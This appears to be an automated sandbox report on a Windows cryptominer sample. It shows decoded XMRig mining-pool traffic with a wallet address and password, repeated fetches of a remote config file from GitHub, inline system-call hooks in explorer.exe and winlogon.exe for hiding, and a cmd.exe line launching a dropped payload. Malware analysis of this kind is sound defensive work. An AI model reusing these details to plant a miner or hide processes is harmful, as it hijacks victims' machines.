                                                                                                                                        ETag: "4f6da874475e426b83a33a7a2607a5ab1b75bd149d959d2ec1fd6ad2989b1d21"
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        X-Frame-Options: deny
                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                        X-GitHub-Request-Id: 5DAE:2FAB:22749E:2A3096:65E1E48A
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Date: Fri, 01 Mar 2024 14:22:02 GMT
                                                                                                                                        Via: 1.1 varnish
                                                                                                                                        X-Served-By: cache-ewr18134-EWR
                                                                                                                                        X-Cache: MISS
                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                        X-Timer: S1709302922.162269,VS0,VE48
                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                        X-Fastly-Request-ID: d0762a896cdcd6e410a7e130ab161ee02182c025
                                                                                                                                        Expires: Fri, 01 Mar 2024 14:27:02 GMT
                                                                                                                                        Source-Age: 0
                                                                                                                                        2024-03-01 14:22:02 UTC38INData Raw: 32 2e 38 7c 70 70 36 71 54 75 50 48 37 63 45 4c 7a 4b 71 55 64 6f 48 75 43 66 41 32 32 67 61 4f 42 6d 4c 66 7c 0a
                                                                                                                                        Data Ascii: 2.8|pp6qTuPH7cELzKqUdoHuCfA22gaOBmLf|


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        1192.168.2.449731142.202.242.434431508C:\Windows\System32\dialer.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-03-01 14:22:12 UTC598OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 36 36 42 66 4e 7a 4e 75 67 41 57 34 41 77 37 4e 47 39 34 50 6b 56 38 70 4d 35 4d 7a 74 6f 4a 71 59 58 78 35 65 66 53 43 73 44 67 55 64 56 50 6d 79 35 32 75 52 6a 63 70 4c 62 44 68 50 38 6d 33 45 36 42 4e 36 7a 6b 7a 4a 69 56 6a 43 56 72 57 36 7a 63 53 76 35 32 37 79 37 31 72 6a 39 22 2c 22 70 61 73 73 22 3a 22 6d 61 6d 6f 6e 74 36 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 39 2e 33 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 32 32 22 2c 22 72 69 67 69
                                                                                                                                        Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"466BfNzNugAW4Aw7NG94PkV8pM5MztoJqYXx5efSCsDgUdVPmy52uRjcpLbDhP8m3E6BN6zkzJiVjCVrW6zcSv527y71rj9","pass":"mamont6","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022","rigi
                                                                                                                                        2024-03-01 14:22:12 UTC732INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 31 61 64 65 34 61 36 66 2d 61 36 38 30 2d 34 61 33 37 2d 62 32 33 61 2d 66 62 65 37 65 35 65 32 36 62 62 39 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 37 63 39 38 37 61 66 30 36 38 32 35 32 31 39 35 35 62 32 61 30 63 31 66 33 63 31 37 64 66 34 31 64 37 64 31 39 36 62 30 30 65 64 65 30 66 65 30 65 64 63 65 32 61 35 38 32 30 30 35 38 36 36 34 37 66 62 63 39 34 35 35 34 30 30 30 30 30 30 30 30 31 37 66 62 34 64 38 65 36 32 64 62 66 34 33 37 32 32 63 61 34 64 37 34 63 37 39 35 63 61 63 30 63 36 37 33 37 62 31 39 32 31 39 66 35 64 36 37 62 34 63 64 63 65 34 39 63 32 65 65 31 65 30
                                                                                                                                        Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"1ade4a6f-a680-4a37-b23a-fbe7e5e26bb9","job":{"blob":"101087c987af0682521955b2a0c1f3c17df41d7d196b00ede0fe0edce2a58200586647fbc945540000000017fb4d8e62dbf43722ca4d74c795cac0c6737b19219f5d67b4cdce49c2ee1e0
                                                                                                                                        2024-03-01 14:22:22 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 64 63 39 38 37 61 66 30 36 38 32 35 32 31 39 35 35 62 32 61 30 63 31 66 33 63 31 37 64 66 34 31 64 37 64 31 39 36 62 30 30 65 64 65 30 66 65 30 65 64 63 65 32 61 35 38 32 30 30 35 38 36 36 34 37 66 62 63 39 34 35 35 34 30 30 30 30 30 30 30 30 31 39 34 36 39 37 30 32 33 62 34 35 37 37 35 65 64 64 65 62 65 65 65 36 31 62 64 37 33 65 34 36 34 64 64 30 31 66 34 66 65 65 31 30 31 37 30 63 65 32 36 65 33 64 37 39 64 34 35 34 38 30 33 34 36 30 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 31 64 36 37 62 35 34 65 2d 65 61 62 36 2d 34 32 34 62 2d 38 64 37 33 2d 66 30 36 35 62 32 37 39 38 35 33 36 22 2c 22 74 61
                                                                                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10109dc987af0682521955b2a0c1f3c17df41d7d196b00ede0fe0edce2a58200586647fbc9455400000000194697023b45775eddebeee61bd73e464dd01f4fee10170ce26e3d79d454803460","job_id":"1d67b54e-eab6-424b-8d73-f065b2798536","ta
                                                                                                                                        2024-03-01 14:22:44 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 33 63 39 38 37 61 66 30 36 38 32 35 32 31 39 35 35 62 32 61 30 63 31 66 33 63 31 37 64 66 34 31 64 37 64 31 39 36 62 30 30 65 64 65 30 66 65 30 65 64 63 65 32 61 35 38 32 30 30 35 38 36 36 34 37 66 62 63 39 34 35 35 34 30 30 30 30 30 30 30 30 31 66 61 66 65 66 30 63 33 66 32 64 30 63 36 39 34 30 65 33 31 31 64 34 36 33 32 32 63 39 61 65 35 65 62 61 35 63 36 36 35 33 35 31 37 38 36 38 33 64 33 35 63 37 32 64 36 64 36 34 34 31 62 36 36 35 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 62 31 37 36 61 30 34 63 2d 30 37 37 39 2d 34 32 33 36 2d 39 62 38 61 2d 61 35 39 65 35 38 31 62 37 65 38 38 22 2c 22 74 61
                                                                                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010b3c987af0682521955b2a0c1f3c17df41d7d196b00ede0fe0edce2a58200586647fbc94554000000001fafef0c3f2d0c6940e311d46322c9ae5eba5c66535178683d35c72d6d6441b665","job_id":"b176a04c-0779-4236-9b8a-a59e581b7e88","ta
                                                                                                                                        2024-03-01 14:22:46 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 36 63 39 38 37 61 66 30 36 66 66 39 62 62 38 61 66 38 30 36 61 30 65 64 62 34 62 38 30 66 30 37 30 33 62 30 30 61 65 33 64 66 65 36 61 61 61 65 35 31 61 31 38 65 34 39 65 36 64 35 30 34 61 64 33 31 30 61 35 62 31 33 64 30 30 30 30 30 30 30 30 33 63 61 31 37 37 65 62 63 63 36 33 61 36 39 30 36 36 39 39 63 66 31 35 37 39 32 63 34 64 35 65 36 37 64 62 36 66 35 34 38 37 34 32 34 33 37 63 39 63 65 66 33 61 34 66 35 38 63 63 32 61 36 30 30 35 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 31 35 31 37 64 66 32 38 2d 62 37 32 37 2d 34 61 62 39 2d 62 30 37 66 2d 64 61 64 63 65 63 38 33 63 31 64 61 22 2c 22 74 61
                                                                                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010b6c987af06ff9bb8af806a0edb4b80f0703b00ae3dfe6aaae51a18e49e6d504ad310a5b13d000000003ca177ebcc63a6906699cf15792c4d5e67db6f548742437c9cef3a4f58cc2a6005","job_id":"1517df28-b727-4ab9-b07f-dadcec83c1da","ta
                                                                                                                                        2024-03-01 14:23:01 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 36 63 39 38 37 61 66 30 36 66 66 39 62 62 38 61 66 38 30 36 61 30 65 64 62 34 62 38 30 66 30 37 30 33 62 30 30 61 65 33 64 66 65 36 61 61 61 65 35 31 61 31 38 65 34 39 65 36 64 35 30 34 61 64 33 31 30 61 35 62 31 33 64 30 30 30 30 30 30 30 30 64 32 35 32 64 62 66 31 64 30 35 36 38 66 31 62 34 34 32 38 32 64 65 61 38 35 61 34 61 38 30 66 39 63 30 31 31 38 30 37 31 64 30 63 30 65 35 34 65 31 30 37 39 32 66 39 35 32 65 31 64 36 35 64 30 35 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 33 30 34 35 31 37 64 35 2d 32 61 63 30 2d 34 30 38 64 2d 38 66 62 34 2d 37 36 61 31 65 61 64 30 32 35 37 35 22 2c 22 74 61
                                                                                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010b6c987af06ff9bb8af806a0edb4b80f0703b00ae3dfe6aaae51a18e49e6d504ad310a5b13d00000000d252dbf1d0568f1b44282dea85a4a80f9c0118071d0c0e54e10792f952e1d65d05","job_id":"304517d5-2ac0-408d-8fb4-76a1ead02575","ta
                                                                                                                                        2024-03-01 14:23:08 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 62 63 39 38 37 61 66 30 36 66 66 39 62 62 38 61 66 38 30 36 61 30 65 64 62 34 62 38 30 66 30 37 30 33 62 30 30 61 65 33 64 66 65 36 61 61 61 65 35 31 61 31 38 65 34 39 65 36 64 35 30 34 61 64 33 31 30 61 35 62 31 33 64 30 30 30 30 30 30 30 30 62 32 64 39 31 61 32 62 31 36 63 66 39 63 33 38 37 38 61 37 38 61 37 39 34 65 36 62 66 30 62 38 34 39 65 63 64 36 38 66 61 39 63 65 30 64 65 63 38 61 31 38 61 61 31 39 33 64 36 34 30 34 35 36 30 64 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 64 37 37 37 61 30 62 65 2d 61 30 36 33 2d 34 32 34 36 2d 39 63 34 33 2d 32 35 66 36 33 37 64 62 63 39 65 38 22 2c 22 74 61
                                                                                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010cbc987af06ff9bb8af806a0edb4b80f0703b00ae3dfe6aaae51a18e49e6d504ad310a5b13d00000000b2d91a2b16cf9c3878a78a794e6bf0b849ecd68fa9ce0dec8a18aa193d6404560d","job_id":"d777a0be-a063-4246-9c43-25f637dbc9e8","ta
                                                                                                                                        2024-03-01 14:23:10 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 65 63 39 38 37 61 66 30 36 61 35 66 61 65 63 62 33 61 64 30 30 61 34 64 61 30 33 31 35 34 62 61 63 36 36 63 66 61 36 37 62 39 33 37 36 61 34 61 63 34 61 38 39 65 33 31 36 39 32 37 39 66 37 33 66 31 36 65 31 31 65 64 65 30 30 30 30 30 30 30 30 39 65 64 61 38 36 32 64 33 33 33 35 62 38 63 35 66 31 31 62 64 32 36 38 31 35 65 37 31 36 62 35 30 35 66 30 61 33 33 38 38 31 39 32 30 63 35 66 34 33 61 37 64 66 62 61 38 64 62 32 32 35 66 64 30 32 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 33 61 63 36 30 64 62 65 2d 64 37 63 38 2d 34 35 65 61 2d 38 36 31 66 2d 36 31 65 34 64 38 33 35 35 38 31 61 22 2c 22 74 61
                                                                                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010cec987af06a5faecb3ad00a4da03154bac66cfa67b9376a4ac4a89e3169279f73f16e11ede000000009eda862d3335b8c5f11bd26815e716b505f0a33881920c5f43a7dfba8db225fd02","job_id":"3ac60dbe-d7c8-45ea-861f-61e4d835581a","ta
                                                                                                                                        2024-03-01 14:23:32 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 33 63 39 38 37 61 66 30 36 61 35 66 61 65 63 62 33 61 64 30 30 61 34 64 61 30 33 31 35 34 62 61 63 36 36 63 66 61 36 37 62 39 33 37 36 61 34 61 63 34 61 38 39 65 33 31 36 39 32 37 39 66 37 33 66 31 36 65 31 31 65 64 65 30 30 30 30 30 30 30 30 33 62 63 64 64 33 66 30 35 35 61 33 61 33 35 39 35 64 36 36 30 61 63 33 34 65 37 66 38 39 66 36 37 36 39 66 62 61 39 38 37 38 39 35 30 63 63 33 34 39 34 36 32 33 39 66 35 62 32 64 36 39 31 37 30 36 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 63 35 35 34 38 36 37 31 2d 32 39 64 66 2d 34 66 34 35 2d 39 63 38 37 2d 63 32 31 61 62 36 66 62 34 37 39 33 22 2c 22 74 61
                                                                                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e3c987af06a5faecb3ad00a4da03154bac66cfa67b9376a4ac4a89e3169279f73f16e11ede000000003bcdd3f055a3a3595d660ac34e7f89f6769fba9878950cc34946239f5b2d691706","job_id":"c5548671-29df-4f45-9c87-c21ab6fb4793","ta
                                                                                                                                        2024-03-01 14:23:54 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 39 63 39 38 37 61 66 30 36 61 35 66 61 65 63 62 33 61 64 30 30 61 34 64 61 30 33 31 35 34 62 61 63 36 36 63 66 61 36 37 62 39 33 37 36 61 34 61 63 34 61 38 39 65 33 31 36 39 32 37 39 66 37 33 66 31 36 65 31 31 65 64 65 30 30 30 30 30 30 30 30 35 61 62 61 34 37 38 63 39 62 66 39 64 63 37 36 39 35 30 62 62 62 33 64 37 62 34 61 66 36 64 38 61 61 63 31 63 61 33 66 30 36 34 37 30 62 63 31 35 35 66 30 32 65 38 62 31 37 39 37 33 32 34 33 30 66 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 61 39 37 61 61 63 32 66 2d 34 38 38 35 2d 34 35 38 34 2d 61 31 34 32 2d 66 33 62 31 30 33 33 63 33 31 66 65 22 2c 22 74 61
                                                                                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010f9c987af06a5faecb3ad00a4da03154bac66cfa67b9376a4ac4a89e3169279f73f16e11ede000000005aba478c9bf9dc76950bbb3d7b4af6d8aac1ca3f06470bc155f02e8b179732430f","job_id":"a97aac2f-4885-4584-a142-f3b1033c31fe","ta


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                        2192.168.2.449733185.199.111.133443
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-03-01 14:22:14 UTC108OUTGET /attationin/Cloud/main/Milinfo.txt HTTP/1.1
                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        2024-03-01 14:22:14 UTC888INHTTP/1.1 200 OK
                                                                                                                                        Connection: close
                                                                                                                                        Content-Length: 38
                                                                                                                                        Cache-Control: max-age=300
                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                        ETag: "4f6da874475e426b83a33a7a2607a5ab1b75bd149d959d2ec1fd6ad2989b1d21"
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        X-Frame-Options: deny
                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                        X-GitHub-Request-Id: 5DAE:2FAB:22749E:2A3096:65E1E48A
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Date: Fri, 01 Mar 2024 14:22:14 GMT
                                                                                                                                        Via: 1.1 varnish
                                                                                                                                        X-Served-By: cache-ewr18139-EWR
                                                                                                                                        X-Cache: HIT
                                                                                                                                        X-Cache-Hits: 1
                                                                                                                                        X-Timer: S1709302935.812147,VS0,VE1
                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                        X-Fastly-Request-ID: eb8f225b640f46235f598db945fab108a303f55e
                                                                                                                                        Expires: Fri, 01 Mar 2024 14:27:14 GMT
                                                                                                                                        Source-Age: 13
                                                                                                                                        2024-03-01 14:22:14 UTC38INData Raw: 32 2e 38 7c 70 70 36 71 54 75 50 48 37 63 45 4c 7a 4b 71 55 64 6f 48 75 43 66 41 32 32 67 61 4f 42 6d 4c 66 7c 0a
                                                                                                                                        Data Ascii: 2.8|pp6qTuPH7cELzKqUdoHuCfA22gaOBmLf|


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                        3192.168.2.449749185.199.111.133443
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-03-01 14:22:33 UTC108OUTGET /attationin/Cloud/main/Milinfo.txt HTTP/1.1
                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        2024-03-01 14:22:33 UTC889INHTTP/1.1 200 OK
                                                                                                                                        Connection: close
                                                                                                                                        Content-Length: 38
                                                                                                                                        Cache-Control: max-age=300
                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                        ETag: "4f6da874475e426b83a33a7a2607a5ab1b75bd149d959d2ec1fd6ad2989b1d21"
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        X-Frame-Options: deny
                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                        X-GitHub-Request-Id: F8B0:587C:209C48:2857AC:65E1E4A9
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Date: Fri, 01 Mar 2024 14:22:33 GMT
                                                                                                                                        Via: 1.1 varnish
                                                                                                                                        X-Served-By: cache-lga21964-LGA
                                                                                                                                        X-Cache: MISS
                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                        X-Timer: S1709302953.217841,VS0,VE21
                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                        X-Fastly-Request-ID: d8bf97d846bf48232648976c6ac72c52adb0b30a
                                                                                                                                        Expires: Fri, 01 Mar 2024 14:27:33 GMT
                                                                                                                                        Source-Age: 0
                                                                                                                                        2024-03-01 14:22:33 UTC38INData Raw: 32 2e 38 7c 70 70 36 71 54 75 50 48 37 63 45 4c 7a 4b 71 55 64 6f 48 75 43 66 41 32 32 67 61 4f 42 6d 4c 66 7c 0a
                                                                                                                                        Data Ascii: 2.8|pp6qTuPH7cELzKqUdoHuCfA22gaOBmLf|


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                        4192.168.2.449759185.199.111.133443
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-03-01 14:22:41 UTC108OUTGET /attationin/Cloud/main/Milinfo.txt HTTP/1.1
                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        2024-03-01 14:22:41 UTC887INHTTP/1.1 200 OK
                                                                                                                                        Connection: close
                                                                                                                                        Content-Length: 38
                                                                                                                                        Cache-Control: max-age=300
                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                        ETag: "4f6da874475e426b83a33a7a2607a5ab1b75bd149d959d2ec1fd6ad2989b1d21"
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        X-Frame-Options: deny
                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                        X-GitHub-Request-Id: F8B0:587C:209C48:2857AC:65E1E4A9
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Date: Fri, 01 Mar 2024 14:22:41 GMT
                                                                                                                                        Via: 1.1 varnish
                                                                                                                                        X-Served-By: cache-lga21949-LGA
                                                                                                                                        X-Cache: HIT
                                                                                                                                        X-Cache-Hits: 1
                                                                                                                                        X-Timer: S1709302961.244544,VS0,VE1
                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                        X-Fastly-Request-ID: 6a6a7e1d32a4d64064259ffc4aed9586d838a5d9
                                                                                                                                        Expires: Fri, 01 Mar 2024 14:27:41 GMT
                                                                                                                                        Source-Age: 8
                                                                                                                                        2024-03-01 14:22:41 UTC38INData Raw: 32 2e 38 7c 70 70 36 71 54 75 50 48 37 63 45 4c 7a 4b 71 55 64 6f 48 75 43 66 41 32 32 67 61 4f 42 6d 4c 66 7c 0a
                                                                                                                                        Data Ascii: 2.8|pp6qTuPH7cELzKqUdoHuCfA22gaOBmLf|


                                                                                                                                        Code Manipulations

                                                                                                                                        Function NameHook TypeActive in Processes
                                                                                                                                        ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                        NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                                                        ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                                                                                        NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                                                                                        ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                                                                                        NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                        NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                                                                                                        ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                        ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                                                        NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                                                                                        RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                                                        NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                                                                                        NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                        ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                                                                                        ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                                                                                                        Function NameHook TypeNew Data
                                                                                                                                        ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                        NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                        ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                        NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                        ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                        NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                        NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                        ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                        ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                        NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                        RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                        NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                        NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                        ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                        ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                        Function NameHook TypeNew Data
                                                                                                                                        ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                        NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                        ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                        NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                        ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                        NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                        NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                        ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                        ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                        NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                        RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                        NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                        NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                        ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                        ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                                                                                        Click to jump to process

                                                                                                                                        Click to jump to process

                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                        Click to jump to process

                                                                                                                                        Target ID:0
                                                                                                                                        Start time:15:21:54
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Users\user\Desktop\hacn.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Users\user\Desktop\hacn.exe
                                                                                                                                        Imagebase:0x7ff61d320000
                                                                                                                                        File size:12'925'322 bytes
                                                                                                                                        MD5 hash:98AE932A21FEE19C4B51FFA7ABD4CEC1
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:1
                                                                                                                                        Start time:15:21:55
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Users\user\Desktop\hacn.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Users\user\Desktop\hacn.exe
                                                                                                                                        Imagebase:0x7ff61d320000
                                                                                                                                        File size:12'925'322 bytes
                                                                                                                                        MD5 hash:98AE932A21FEE19C4B51FFA7ABD4CEC1
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:2
                                                                                                                                        Start time:15:21:56
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogym
                                                                                                                                        Imagebase:0x7ff664270000
                                                                                                                                        File size:289'792 bytes
